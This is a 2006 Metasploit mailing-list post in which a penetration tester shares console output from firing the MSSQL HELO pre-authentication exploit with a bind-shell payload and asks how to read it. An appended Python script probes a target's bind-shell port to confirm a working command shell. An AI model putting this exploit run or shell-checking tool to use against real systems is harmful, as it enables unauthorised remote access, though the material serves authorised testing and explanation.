Metasploit mailing list archives

Exploit MSSQL HELO vuln


From: joshuaperrymon at gmail.com (Josh L. Perrymon)
Date: Wed, 5 Apr 2006 13:11:51 +1000

Hey Guys,

I'm working on a penetration test and have found a MSSQL install vulnerable
to the HELO exploit-

Both networks are behind firewalls... (attacker and target)

I set up Metasploit 2.5 with the exploit > payload > and RHOST and LHOST
info..

Exploit is sent using win32_bindshell

-------------------

msf mssql2000_preauthentication(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000  (0x42b68aba / 0x42d01e50)
[*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334

[*] Exiting Bind Handler.

msf mssql2000_preauthentication(win32_bind) >

--------------------------

Does this mean the remote machine has a connection to my local machine? When
I try telnetting to 127.0.0.1:33334 it has a blinking cursor and then drops the
connection?

I haven't used the bind_shell payload before because I usually have the
ability to put myself outside the firewall when attempting exploits.

Thanks for the help...

JP
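Added illustration, not part of the original thread or of the Metasploit framework: a small Python probe that does what a bind handler has to do after the exploit fires, namely connect out to the payload's listening port on the target and find out whether a command shell is actually answering. It classifies the four outcomes a tester sees in practice: the connect is refused (nothing listening), it times out (a firewall in front of the target drops the inbound SYN, the usual reason bind payloads fail when the target is behind a firewall), it is accepted and then dropped, or a shell answers the command. The listener in the block is a constructed stand-in for the payload so the script runs offline; the banner text, the `echo bindshell-ok` marker and the port numbers are assumptions for the demo and have nothing to do with SQL Server.

```python
import socket
import threading


def start_fake_bind_shell(answer: bool = True) -> int:
    """Constructed stand-in for a bind-shell payload on the target.

    Listens on 127.0.0.1 on a free port, accepts one connection and either
    behaves like a cmd.exe shell (answer=True) or accepts and immediately
    drops the connection (answer=False). Returns the bound port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve() -> None:
        conn, _ = srv.accept()
        srv.close()
        with conn:
            if answer:
                # Assumed banner; a real cmd.exe bind shell prints something similar.
                conn.sendall(b"Microsoft Windows 2000 [Version 5.00.2195]\r\nC:\\WINNT\\system32>")
                data = conn.recv(1024)
                if data.strip() == b"echo bindshell-ok":
                    conn.sendall(b"bindshell-ok\r\n")
            # answer=False: connection is closed here without sending anything.

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_port() -> int:
    """Pick a loopback port that nothing is listening on (for the 'refused' case)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe_bind_shell(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect to a bind payload port and say what is on the other end.

    Returns one of:
      'refused'  - TCP RST on connect: no listener, payload never ran or wrong port
      'filtered' - connect timed out: a firewall is dropping inbound traffic to the target
      'closed'   - connection accepted but closed before a shell answered
      'silent'   - connection stays open but nothing answers the command
      'shell'    - a command shell executed our marker command
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        s.close()
        return "refused"
    except socket.timeout:
        s.close()
        return "filtered"

    with s:
        try:
            # Marker command: a real shell echoes the word back, a non-shell service does not.
            s.sendall(b"echo bindshell-ok\r\n")
            buf = b""
            while b"bindshell-ok" not in buf:
                chunk = s.recv(4096)
                if not chunk:          # orderly close with no answer
                    return "closed"
                buf += chunk
            return "shell"
        except socket.timeout:
            return "silent"
        except OSError:                # RST / broken pipe after accept
            return "closed"


if __name__ == "__main__":
    # Demo against the constructed stand-ins; substitute RHOST and the payload's
    # bind port when checking a real target.
    print("shell  :", probe_bind_shell("127.0.0.1", start_fake_bind_shell(answer=True)))
    print("dropped:", probe_bind_shell("127.0.0.1", start_fake_bind_shell(answer=False), timeout=2.0))
    print("refused:", probe_bind_shell("127.0.0.1", free_port()))
```

The 'filtered' outcome cannot be reproduced on loopback, but it is the one that matters for a target behind a firewall: a bind payload needs an inbound connection to the target, so if the probe times out the exploit may well have worked and the shell is simply unreachable, which is the situation a reverse payload (target connects back to LHOST) is designed for.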

